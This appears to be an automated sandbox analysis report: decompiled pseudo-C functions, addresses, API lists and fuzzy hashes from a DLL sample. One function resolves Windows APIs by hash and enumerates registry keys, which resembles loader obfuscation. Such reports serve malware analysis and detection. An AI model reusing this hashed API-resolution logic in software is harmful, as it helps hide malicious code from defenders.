                          0x27ed3713044
                          0x27ed371304c
                          0x27ed3713057
                          0x27ed371305f
                          0x27ed3713065
                          0x27ed3713067
                          0x27ed371306e
                          0x27ed371307e
                          0x27ed3713086
                          0x27ed371308c
                          0x27ed37130a0

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc
                          • String ID: uJ
                          • API String ID: 3901518246-2850656762
                          • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction ID: edaf473f8a1c6e3d419db965dda394a82f3ca4ee57043899b22cece76d7e2775
                          • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction Fuzzy Hash: FD818C33608B80D6EF24CB12E448B9BB3A9F78A784F425065EE4D43B96DB39D455CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00007FF87FF88C0820A8(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
                          				void* _t43;
                          				signed int _t52;
                          				void* _t53;
                          				void* _t61;
                          				signed int _t64;
                          				signed char _t66;
                          				signed char _t75;
                          				signed int _t76;
                          				void* _t100;
                          				signed int _t109;
                          
                          				_t75 = __edx;
                          				_a8 = __rbx;
                          				_a24 = __rbp;
                          				 *__rcx = 0;
                          				r14d = r9d;
                          				_t76 = __edx;
                          				if (__eflags == 0) goto 0x8c08211a;
                          				if (__eflags == 0) goto 0x8c0820f9;
                          				if ((__edx & 0x00000003) - 1 == 1) goto 0x8c0820f2;
                          				_t43 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t43);
                          				goto 0x8c08211f;
                          				goto 0x8c08211f;
                          				asm("sbb eax, eax");
                          				goto 0x8c08211f;
                          				__rcx[1] = 0x80000000;
                          				_t52 = _t76 & 0x00000700;
                          				if ((_t75 & 0x00000008) == 0) goto 0x8c08218b;
                          				if (_t52 == 0x100) goto 0x8c082184;
                          				if (_t52 == 0x200) goto 0x8c08217d;
                          				if (_t52 == 0x300) goto 0x8c082176;
                          				if (_t52 == 0x400) goto 0x8c08218b;
                          				if (_t52 == 0x500) goto 0x8c08216f;
                          				if (_t52 == 0x600) goto 0x8c08217d;
                          				_t100 = _t52 - 0x700;
                          				if (_t100 == 0) goto 0x8c08216f;
                          				_t53 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t53);
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				__rcx[2] = 3;
                          				if (_t100 == 0) goto 0x8c0821e2;
                          				if (_t100 == 0) goto 0x8c0821db;
                          				if (_t100 == 0) goto 0x8c0821d4;
                          				if (_t100 == 0) goto 0x8c0821cd;
                          				if (_t100 == 0) goto 0x8c0821be;
                          				_t61 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t61);
                          				goto 0x8c0821e4;
                          				sil = __rcx[1] == 0x80000000;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				__rcx[5] = __rcx[5] & 0x00000000;
                          				bpl = 0x80;
                          				__rcx[3] = 0;
                          				__rcx[4] = 0x80;
                          				if ((bpl & dil) == 0) goto 0x8c0821fd;
                          				 *__rcx =  *__rcx | 0x00000010;
                          				if ((0x00008000 & _t76) != 0) goto 0x8c082225;
                          				if ((_t76 & 0x00074000) != 0) goto 0x8c082222;
                          				if (E00007FF87FF88C084DDC(_t75, __rax,  &_a16) != 0) goto 0x8c08229b;
                          				if (_a16 == 0x8000) goto 0x8c082225;
                          				 *__rcx =  *__rcx | bpl;
                          				if ((0x00000100 & _t76) == 0) goto 0x8c082245;
                          				_t64 =  *0x8c0b4dd4; // 0x0
                          				_t66 =  !_t64 & r14d;
                          				if ((bpl & _t66) != 0) goto 0x8c082245;
                          				__rcx[4] = 1;
                          				_t109 = dil & 0x00000040;
                          				if (_t109 == 0) goto 0x8c082259;
                          				asm("bts dword [ebx+0x14], 0x1a");
                          				asm("bts dword [ebx+0x4], 0x10");
                          				__rcx[3] = __rcx[3] | 0x00000004;
                          				asm("bt edi, 0xc");
                          				if (_t109 >= 0) goto 0x8c082262;
                          				__rcx[4] = __rcx[4] | 0x00000100;
                          				asm("bt edi, 0xd");
                          				if (_t109 >= 0) goto 0x8c08226d;
                          				asm("bts dword [ebx+0x14], 0x19");
                          				if ((dil & 0x00000020) == 0) goto 0x8c08227a;
                          				asm("bts dword [ebx+0x14], 0x1b");
                          				goto 0x8c082285;
                          				if ((dil & 0x00000010) == 0) goto 0x8c082285;
                          				asm("bts dword [ebx+0x14], 0x1c");
                          				return _t66;
                          			}













                          0x7ff88c0820a8
                          0x7ff88c0820a8
                          0x7ff88c0820ad
                          0x7ff88c0820bd
                          0x7ff88c0820c2
                          0x7ff88c0820c8
                          0x7ff88c0820d2
                          0x7ff88c0820d7
                          0x7ff88c0820dc
                          0x7ff88c0820de
                          0x7ff88c0820e3
                          0x7ff88c0820e9
                          0x7ff88c0820f0
                          0x7ff88c0820f7
                          0x7ff88c08210c
                          0x7ff88c082118
                          0x7ff88c08211f
                          0x7ff88c082129
                          0x7ff88c08212b
                          0x7ff88c082132
                          0x7ff88c082139
                          0x7ff88c082140
                          0x7ff88c082147
                          0x7ff88c08214e
                          0x7ff88c082155
                          0x7ff88c082157
                          0x7ff88c082159
                          0x7ff88c08215b
                          0x7ff88c082160
                          0x7ff88c082166
                          0x7ff88c08216d
                          0x7ff88c082174
                          0x7ff88c08217b
                          0x7ff88c082182
                          0x7ff88c082189
                          0x7ff88c082190
                          0x7ff88c082196
                          0x7ff88c08219b
                          0x7ff88c0821a0
                          0x7ff88c0821a5
                          0x7ff88c0821aa
                          0x7ff88c0821ac
                          0x7ff88c0821b1
                          0x7ff88c0821b7
                          0x7ff88c0821bc
                          0x7ff88c0821c7
                          0x7ff88c0821cb
                          0x7ff88c0821d2
                          0x7ff88c0821d9
                          0x7ff88c0821e0
                          0x7ff88c0821e4
                          0x7ff88c0821e8
                          0x7ff88c0821eb
                          0x7ff88c0821ee
                          0x7ff88c0821f8
                          0x7ff88c0821fa
                          0x7ff88c082204
                          0x7ff88c08220c
                          0x7ff88c08221a
                          0x7ff88c082220
                          0x7ff88c082222
                          0x7ff88c08222c
                          0x7ff88c08222e
                          0x7ff88c082236
                          0x7ff88c08223c
                          0x7ff88c08223e
                          0x7ff88c082245
                          0x7ff88c082249
                          0x7ff88c08224b
                          0x7ff88c082250
                          0x7ff88c082255
                          0x7ff88c082259
                          0x7ff88c08225d
                          0x7ff88c08225f
                          0x7ff88c082262
                          0x7ff88c082266
                          0x7ff88c082268
                          0x7ff88c082271
                          0x7ff88c082273
                          0x7ff88c082278
                          0x7ff88c08227e
                          0x7ff88c082280
                          0x7ff88c08229a

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo$_get_daylight
                          • String ID:
                          • API String ID: 72036449-0
                          • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                          • Instruction ID: 5df47e6e18ebaebc7e9b1d1f469532fd3cdc8f02e1f9d61042ffd119752d8ec2
                          • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                          • Instruction Fuzzy Hash: 03518F22D0C20686FF79592ADD0537A6AC0FB62BD5F29C435DB09862DEDF3DE940C681
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00007FF87FF88C07F0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                          				void* _t4;
                          				void* _t9;
                          				intOrPtr _t11;
                          				intOrPtr _t14;
                          				void* _t23;
                          				void* _t29;
                          				void* _t32;
                          				void* _t33;
                          
                          				_t29 = __rdx;
                          				_t27 = __rcx;
                          				_t25 = __rbx;
                          				_t23 = __rax;
                          				_a8 = __rbx;
                          				GetLastError();
                          				_t11 =  *0x8c0b3888; // 0x4
                          				if (_t11 == 0xffffffff) goto 0x8c07f0fe;
                          				_t4 = E00007FF87FF88C07F5BC(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                          				if (__rax != 0) goto 0x8c07f13f;
                          				E00007FF87FF88C07E26C(_t4, _t27, _t29);
                          				_t32 = _t23;
                          				if (_t23 != 0) goto 0x8c07f11e;
                          				E00007FF87FF88C07E114(_t23, _t27);
                          				goto 0x8c07f15a;
                          				_t14 =  *0x8c0b3888; // 0x4
                          				if (E00007FF87FF88C07F614(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x8c07f117;
                          				E00007FF87FF88C07EE40(_t32, _t23);
                          				_t9 = E00007FF87FF88C07E114(_t23, _t32);
                          				if (_t32 == 0) goto 0x8c07f15a;
                          				SetLastError(??);
                          				return _t9;
                          			}











                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0de
                          0x7ff88c07f0e4
                          0x7ff88c07f0ef
                          0x7ff88c07f0f1
                          0x7ff88c07f0fc
                          0x7ff88c07f108
                          0x7ff88c07f10d
                          0x7ff88c07f113
                          0x7ff88c07f117
                          0x7ff88c07f11c
                          0x7ff88c07f11e
                          0x7ff88c07f131
                          0x7ff88c07f133
                          0x7ff88c07f13a
                          0x7ff88c07f142
                          0x7ff88c07f146
                          0x7ff88c07f159

                          APIs
                          • GetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F0DE
                          • SetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F146
                          • SetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F15C
                          • abort.LIBCMT ref: 00007FF88C07F162
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ErrorLast$abort
                          • String ID:
                          • API String ID: 1447195878-0
                          • Opcode ID: 7a012ae045e6c987bb9a3b7d4f0e6a1a7c22592a596a8c6bb60e7afd6d044707
                          • Instruction ID: 6852cd3203e04baf55969b6dae345be4d4fe10664b6a2c96994eea04db491ba5
                          • Opcode Fuzzy Hash: 7a012ae045e6c987bb9a3b7d4f0e6a1a7c22592a596a8c6bb60e7afd6d044707
                          • Instruction Fuzzy Hash: 75015220B0A34A46FE5C6770E55A1382191BF66FD0F140438EA2E037DEEF2EF845C611
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID:
                          • API String ID: 2332451156-0
                          • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction ID: 91d321f17eb5e8e22628532108bab3a80b675e99f8318d391c92d082c3fb0a3c
                          • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction Fuzzy Hash: AF215C32609F54C1EF68DB62D54836A63A9EB8EF94F596055DE0D533DACF38C881C310
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 101 3d37e0-3d3845 GetModuleHandleA call 3d40f8 104 3d38bf-3d38c2 101->104 105 3d3847-3d3858 call 3d908c 101->105 107 3d38c8-3d38e1 HeapAlloc 104->107 108 3d3cc0-3d3cd5 104->108 113 3d385a-3d3864 105->113 114 3d3866 105->114 110 3d3cbb 107->110 111 3d38e7-3d3905 call 3d487a call 3d908c 107->111 110->108 122 3d390d-3d394c call 3d638c call 3d908c 111->122 123 3d3907 111->123 116 3d3869-3d387a call 3d40f8 113->116 114->116 116->104 124 3d387c-3d3892 call 3d5fc8 116->124 134 3d395e 122->134 135 3d394e-3d395c 122->135 123->122 124->104 129 3d3894-3d38aa call 3d5fc8 124->129 129->104 136 3d38ac-3d38bd call 3d5fc8 129->136 137 3d3961-3d3968 134->137 135->137 136->104 138 3d398e-3d39b6 HeapAlloc 137->138 139 3d396a-3d397b call 3d908c 137->139 143 3d39bc-3d39d0 call 3d908c 138->143 144 3d3a8e 138->144 151 3d397d-3d397f 139->151 152 3d3984-3d3989 139->152 156 3d39fb 143->156 157 3d39d2-3d39f9 RegOpenKeyW 143->157 146 3d3a93-3d3a99 144->146 149 3d3a9f-3d3ae9 call 3d47b0 call 3da0ac 146->149 150 3d3cb1-3d3cb9 call 3d6ce4 146->150 170 3d3aeb-3d3b03 call 3da0ac 149->170 171 3d3b05-3d3b08 149->171 150->108 164 3d3caa 151->164 155 3d3cac-3d3caf 152->155 155->108 155->150 161 3d39fe-3d3a00 156->161 157->161 165 3d3a7e-3d3a8c HeapFree 161->165 166 3d3a02-3d3a13 call 3d908c 161->166 164->155 165->146 172 3d3a15-3d3a2e RegEnumKeyW 166->172 173 3d3a30 166->173 170->171 171->150 175 3d3b0e-3d3b1f call 3d5058 171->175 176 3d3a33-3d3a35 172->176 173->176 185 3d3b4b-3d3b4e 175->185 186 3d3b21-3d3b35 call 3d405c 175->186 179 3d3a4c-3d3a52 176->179 180 3d3a37-3d3a4a call 3d6644 176->180 183 3d3a5d-3d3a6e call 3d908c 179->183 184 3d3a54-3d3a5b 179->184 180->166 180->179 196 3d3a7a-3d3a7c 183->196 197 3d3a70-3d3a78 RegCloseKey 183->197 184->183 185->150 187 3d3b54-3d3b57 call 3da7a0 185->187 186->185 194 3d3b37-3d3b47 call 3d405c 186->194 195 3d3b5c-3d3b5f 187->195 194->185 199 3d3b6b-3d3b99 195->199 200 3d3b61-3d3b66 195->200 196->146 196->165 197->196 202 3d3baf 199->202 203 3d3b9b-3d3ba3 199->203 200->150 205 3d3bb2-3d3bb5 202->205 204 3d3ba5-3d3bad call 3d4d70 203->204 203->205 204->205 207 3d3bb7-3d3bbc 205->207 208 3d3bc1-3d3bd6 call 3da8e8 205->208 207->150 208->207 212 3d3bd8-3d3bf4 call 3d908c 208->212 215 3d3bfc 212->215 216 3d3bf6-3d3bfa 212->216 217 3d3bff-3d3c07 215->217 216->217 219 3d3c9d-3d3ca5 call 3d9d6c 217->219 220 3d3c0d-3d3c1e call 3d908c 217->220 219->164 224 3d3c26 220->224 225 3d3c20-3d3c24 220->225 226 3d3c29-3d3c3a call 3d908c 224->226 225->226 230 3d3c3c-3d3c49 226->230 231 3d3c4b 226->231 232 3d3c4e-3d3c55 230->232 231->232 234 3d3c6f-3d3c7c call 3d908c 232->234 235 3d3c57-3d3c64 call 3d908c 232->235 240 3d3c8f 234->240 241 3d3c7e-3d3c8d 234->241 235->151 242 3d3c6a-3d3c6d 235->242 243 3d3c92-3d3c95 240->243 241->243 242->155 243->108 245 3d3c97-3d3c9b 243->245 245->235
                          C-Code - Quality: 50%
                          			E003D37E0(void* __ebx, void* __ecx, void* __esi, void* __ebp, long long __rcx, void* __r8, void* __r9, void* __r10) {
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				long _t80;
                          				void* _t82;
                          				void* _t85;
                          				void* _t86;
                          				long _t88;
                          				long _t89;
                          				void* _t90;
                          				void* _t92;
                          				void* _t93;
                          				long _t94;
                          				signed int _t96;
                          				long _t103;
                          				long _t105;
                          				long _t111;
                          				long _t112;
                          				long _t113;
                          				void* _t119;
                          				signed int _t127;
                          				void* _t143;
                          				long long _t146;
                          				signed int _t147;
                          				void* _t148;
                          				void* _t161;
                          				long long* _t162;
                          				long long* _t163;
                          				intOrPtr _t164;
                          				void* _t165;
                          				intOrPtr _t187;
                          				void* _t212;
                          				long long _t224;
                          				intOrPtr _t226;
                          				intOrPtr _t229;
                          				intOrPtr _t231;
                          				long long* _t232;
                          				void* _t233;
                          				void* _t234;
                          				void* _t238;
                          				void* _t239;
                          				void* _t242;
                          				long long _t244;
                          				void* _t245;
                          				long long* _t249;
                          				long long _t251;
                          				void* _t252;
                          				CHAR* _t257;
                          
                          				_t243 = __r10;
                          				_t242 = __r9;
                          				_t236 = __r8;
                          				_t144 = __esi;
                          				_t119 = __ecx;
                          				 *((long long*)(_t233 + 8)) = __rcx;
                          				_push(_t165);
                          				_t234 = _t233 - 0x248;
                          				_t247 =  *0x3dd448;
                          				_t226 =  *0x3dd458;
                          				_t229 =  *((intOrPtr*)(_t226 + 8));
                          				 *((long long*)(_t234 + 0x20)) =  *0x3dd448;
                          				 *(_t234 + 0x298) =  *0x3dd450;
                          				GetModuleHandleA(_t257);
                          				_t80 = E003D40F8(__esi, _t162, _t226 + 0x18, __r8, __r10, _t252, _t249);
                          				r13d = 0;
                          				_t117 = _t80;
                          				if(_t80 == r13d) {
                          					E003D908C(_t80, 0xa30cd0f3,  *((intOrPtr*)(_t226 + 0x18)));
                          					if(_t162 == _t249) {
                          						_t162 = _t249;
                          					} else {
                          						 *_t162();
                          					}
                          					_t111 = E003D40F8(_t144, _t162, _t226 + 0x10, _t236, _t243);
                          					_t117 = _t111;
                          					if(_t111 == r13d) {
                          						_t112 = E003D5FC8(_t119, _t162, _t165, _t247 + 0x3e1082, _t226 + 0x28, _t226);
                          						_t117 = _t112;
                          						if(_t112 == r13d) {
                          							_t113 = E003D5FC8(_t119, _t162, _t165, _t247 + 0x3e1079, _t226 + 0x20, _t226);
                          							_t117 = _t113;
                          							if(_t113 == r13d) {
                          								_t117 = E003D5FC8(_t119, _t162, _t165, _t247 + 0x3e1092, _t226 + 0x30, _t226);
                          							}
                          						}
                          					}
                          				}
                          				if(_t117 != r13d) {
                          					L76:
                          					return _t117;
                          				}
                          				_t82 = HeapAlloc();
                          				_t224 = _t162;
                          				if(_t162 == _t249) {
                          					_t117 = 8;
                          					goto L76;
                          				}
                          				_t238 = _t165;
                          				L003D487A();
                          				E003D908C(_t82, 0x9ffc4c27,  *((intOrPtr*)(_t226 + 0x10)));
                          				if(_t162 != _t249) {
                          					 *_t162();
                          				}
                          				_t24 = _t224 + 0xa8; // 0xa8
                          				_t163 = _t24;
                          				 *_t163 = _t163;
                          				 *((long long*)(_t224 + 0xb0)) = _t163;
                          				 *(_t224 + 0x9c) = r13d;
                          				 *(_t224 + 0xa0) = r13d;
                          				 *(_t224 + 0x98) = r13d;
                          				_t85 = E003D908C(E003D638C(_t119, _t144, _t163, _t165, _t226), 0xdc444c2b,  *((intOrPtr*)(_t226 + 0x18)));
                          				if(_t163 == _t249) {
                          					_t163 = _t249;
                          				} else {
                          					r9d = 0;
                          					r8d = 0;
                          					_t119 = 0;
                          					_t85 =  *_t163();
                          				}
                          				 *((long long*)(_t224 + 0x28)) = _t163;
                          				if(_t163 != _t249) {
                          					_t255 =  *0x3dd458;
                          					r8d = 0x1102;
                          					_t86 = HeapAlloc(??, ??, ??);
                          					_t146 = 0;
                          					_t251 = _t163;
                          					_t34 = _t229 + 0x7f; // 0x7f
                          					r12d = _t34;
                          					__eflags = _t163 - _t229;
                          					if(_t163 == _t229) {
                          						_t117 = 8;
                          						L36:
                          						r13d = 0;
                          						__eflags = _t117 - r13d;
                          						if(_t117 != r13d) {
                          							goto L74;
                          						}
                          						_t231 =  *0x3dd448;
                          						_t47 = _t251 + 8; // 0x8
                          						r8d = _t47;
                          						L003D47B0();
                          						_t239 = 0x3d0000 + _t231 + 0x11188;
                          						 *((intOrPtr*)(_t234 + 0x2a6)) = r13w;
                          						_t88 = E003DA0AC(_t165, _t224, _t234 + 0x2a0, _t224, _t226, _t231, _t239);
                          						_t117 = _t88;
                          						__eflags = _t88 - r13d;
                          						if(_t88 != r13d) {
                          							_t239 = 0x3d0000 + _t231 + 0x111e0;
                          							_t117 = E003DA0AC(_t165, _t224, _t234 + 0x2a0, _t224, _t226, _t231, _t239);
                          						}
                          						__eflags = _t117 - r13d;
                          						if(__eflags == 0) {
                          							_t57 = _t224 + 8; // 0x8
                          							_t212 = _t57;
                          							_t89 = E003D5058(_t117, _t119, 0x7ffe0030, _t144, __eflags, _t163, _t165, _t224, _t212, _t226, _t231, _t239, _t243);
                          							_t117 = _t89;
                          							__eflags = _t89 - r13d;
                          							if(_t89 == r13d) {
                          								_t117 = 8;
                          								E003D405C(_t165, _t224, _t224, _t226, _t231);
                          								 *((long long*)(_t224 + 0x30)) = _t163;
                          								__eflags = _t163 - _t251;
                          								if(_t163 != _t251) {
                          									_t59 = _t224 + 8; // 0x8
                          									E003D405C(_t165, _t59, _t224, _t226, _t231);
                          									__eflags = _t163 - _t251;
                          									 *((long long*)(_t224 + 0x38)) = _t163;
                          									_t117 =  !=  ? r13d : 8;
                          								}
                          							}
                          							__eflags = _t117 - r13d;
                          							if(_t117 == r13d) {
                          								_t90 = E003DA7A0(_t163, _t165, _t224, _t242);
                          								__eflags = _t90 - r13d;
                          								if(_t90 != r13d) {
                          									_t164 =  *((intOrPtr*)(_t234 + 0x20));
                          									r9d =  *(_t234 + 0x298);
                          									_t244 = _t164 + 0x3df000;
                          									r8d =  *(_t244 + 2) & 0x0000ffff;
                          									_t127 = r9d ^ 0xe49a1e6d;
                          									__eflags = _t164 - _t239 + 8;
                          									if(_t164 <= _t239 + 8) {
                          										_t163 = _t251;
                          									} else {
                          										_t163 = _t239 + _t244 + 8;
                          										__eflags = _t127 - r13d;
                          										if(_t127 != r13d) {
                          											E003D4D70(_t163, _t212);
                          										}
                          									}
                          									__eflags = _t163 - _t251;
                          									if(_t163 != _t251) {
                          										r9d = r9d ^ 0xecb028fc;
                          										_t92 = E003DA8E8(_t244, _t212, _t242);
                          										__eflags = _t163 - _t251;
                          										if(_t163 == _t251) {
                          											goto L51;
                          										}
                          										 *((long long*)(_t224 + 0x40)) = _t244;
                          										 *0x3dd440 = _t224;
                          										_t93 = E003D908C(_t92, 0xa30cd0f3,  *((intOrPtr*)(_t226 + 0x18)));
                          										__eflags = _t163 - _t251;
                          										if(_t163 == _t251) {
                          											_t163 = _t251;
                          										} else {
                          											_t119 = 0;
                          											_t93 =  *_t163();
                          										}
                          										__eflags = _t163 -  *((intOrPtr*)(_t234 + 0x290));
                          										if(_t163 ==  *((intOrPtr*)(_t234 + 0x290))) {
                          											asm("lock add dword [esi+0x38], 0x1");
                          											_t94 = E003D9D6C(_t117, _t119, _t143, _t144, _t146, _t148, _t161, _t165, _t224, _t212, _t239, _t242, _t244, _t245);
                          											goto L72;
                          										} else {
                          											_t95 = E003D908C(_t93, 0x9f72cbe0,  *((intOrPtr*)(_t226 + 0x18)));
                          											__eflags = _t163 - _t251;
                          											if(_t163 == _t251) {
                          												_t147 = r13d;
                          											} else {
                          												_t147 =  *_t163();
                          											}
                          											_t96 = E003D908C(_t95, 0xaade337c,  *((intOrPtr*)(_t226 + 0x18)));
                          											__eflags = _t163 - _t251;
                          											if(_t163 == _t251) {
                          												_t232 = _t251;
                          											} else {
                          												r8d = _t147;
                          												_t74 = _t212 + 0x10; // 0x10
                          												_t119 = _t74;
                          												_t96 =  *_t163();
                          												_t232 = _t163;
                          											}
                          											_t187 =  *((intOrPtr*)(_t226 + 0x18));
                          											__eflags = _t232 - _t251;
                          											if(_t232 != _t251) {
                          												E003D908C(_t96, 0x1c8cff93, _t187);
                          												__eflags = _t163 - _t251;
                          												if(_t163 == _t251) {
                          													_t96 = r13d;
                          												} else {
                          													_t96 =  *_t163();
                          												}
                          												__eflags = _t96 - r13d;
                          												if(_t96 != r13d) {
                          													goto L76;
                          												} else {
                          													_t187 =  *((intOrPtr*)(_t226 + 0x18));
                          													goto L64;
                          												}
                          											} else {
                          												L64:
                          												E003D908C(_t96, 0xc06f8334, _t187);
                          												__eflags = _t163 - _t251;
                          												if(_t163 != _t251) {
                          													goto L17;
                          												}
                          												_t117 = r12d;
                          												goto L73;
                          											}
                          										}
                          									} else {
                          										L51:
                          										_t117 = 2;
                          										goto L74;
                          									}
                          								}
                          								_t117 = 0xb7;
                          							}
                          						}
                          						goto L74;
                          					}
                          					 *_t163 = 0;
                          					_t103 = E003D908C(_t86, 0x3d06c463,  *((intOrPtr*)(_t255 + 0x20)));
                          					__eflags = _t163 - _t229;
                          					if(_t163 == _t229) {
                          						_t117 = r12d;
                          					} else {
                          						_t238 = _t234 + 0x2a8;
                          						_t103 = RegOpenKeyW(??, ??, ??); // executed
                          						_t117 = _t103;
                          					}
                          					__eflags = _t117 - _t146;
                          					if(_t117 != _t146) {
                          						L34:
                          						HeapFree();
                          						goto L36;
                          					} else {
                          						while(1) {
                          							_t105 = E003D908C(_t103, 0xdf514773,  *((intOrPtr*)(_t255 + 0x20)));
                          							__eflags = _t163;
                          							if(_t163 == 0) {
                          								_t117 = r12d;
                          							} else {
                          								_t238 = _t234 + 0x30;
                          								r9d = 0x104;
                          								_t105 = RegEnumKeyW(??, ??, ??, ??); // executed
                          								_t117 = _t105;
                          							}
                          							__eflags = _t117;
                          							if(_t117 != 0) {
                          								break;
                          							}
                          							_t146 = _t146 + 1;
                          							_t103 = E003D6644(_t117, _t143, _t165, _t251, _t234 + 0x30, _t226, _t238, _t243);
                          							_t117 = _t103;
                          							__eflags = _t103;
                          							if(_t103 == 0) {
                          								continue;
                          							}
                          							break;
                          						}
                          						__eflags = _t117 - 0x103;
                          						if(_t117 == 0x103) {
                          							 *0x3dd438 = _t251;
                          							_t117 = 0;
                          							__eflags = 0;
                          						}
                          						E003D908C(_t105, 0xbba3b4b6,  *((intOrPtr*)(_t255 + 0x20)));
                          						__eflags = _t163;
                          						if(_t163 != 0) {
                          							RegCloseKey(); // executed
                          						}
                          						__eflags = _t117;
                          						if(_t117 == 0) {
                          							goto L36;
                          						} else {
                          							goto L34;
                          						}
                          					}
                          				} else {
                          					E003D908C(_t85, 0xc06f8334,  *((intOrPtr*)(_t226 + 0x18)));
                          					if(_t163 == _t249) {
                          						_t117 = 0x7f;
                          						L73:
                          						if(_t117 == r13d) {
                          							goto L76;
                          						}
                          						L74:
                          						E003D6CE4(_t119, _t163, _t165, _t224, _t226);
                          						goto L76;
                          					}
                          					L17:
                          					_t94 =  *_t163();
                          					L72:
                          					_t117 = _t94;
                          					goto L73;
                          				}
                          			}




















































                          0x003d37e0
                          0x003d37e0
                          0x003d37e0
                          0x003d37e0
                          0x003d37e0
                          0x003d37e0
                          0x003d37e5
                          0x003d37f1
                          0x003d37f8
                          0x003d37ff
                          0x003d380c
                          0x003d3817
                          0x003d3824
                          0x003d382b
                          0x003d3838
                          0x003d383d
                          0x003d3840
                          0x003d3845
                          0x003d3850
                          0x003d3858
                          0x003d3866
                          0x003d385a
                          0x003d3862
                          0x003d3862
                          0x003d3870
                          0x003d3875
                          0x003d387a
                          0x003d3888
                          0x003d388d
                          0x003d3892
                          0x003d38a0
                          0x003d38a5
                          0x003d38aa
                          0x003d38bd
                          0x003d38bd
                          0x003d38aa
                          0x003d3892
                          0x003d387a
                          0x003d38c2
                          0x003d3cc0
                          0x003d3cd5
                          0x003d3cd5
                          0x003d38d5
                          0x003d38db
                          0x003d38e1
                          0x003d3cbb
                          0x00000000
                          0x003d3cbb
                          0x003d38e7
                          0x003d38ef
                          0x003d38fd
                          0x003d3905
                          0x003d390b
                          0x003d390b
                          0x003d390d
